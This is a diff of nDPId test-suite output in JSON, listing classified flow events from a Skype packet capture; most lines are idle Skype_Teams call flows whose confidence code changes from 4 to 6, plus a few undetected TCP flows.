-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 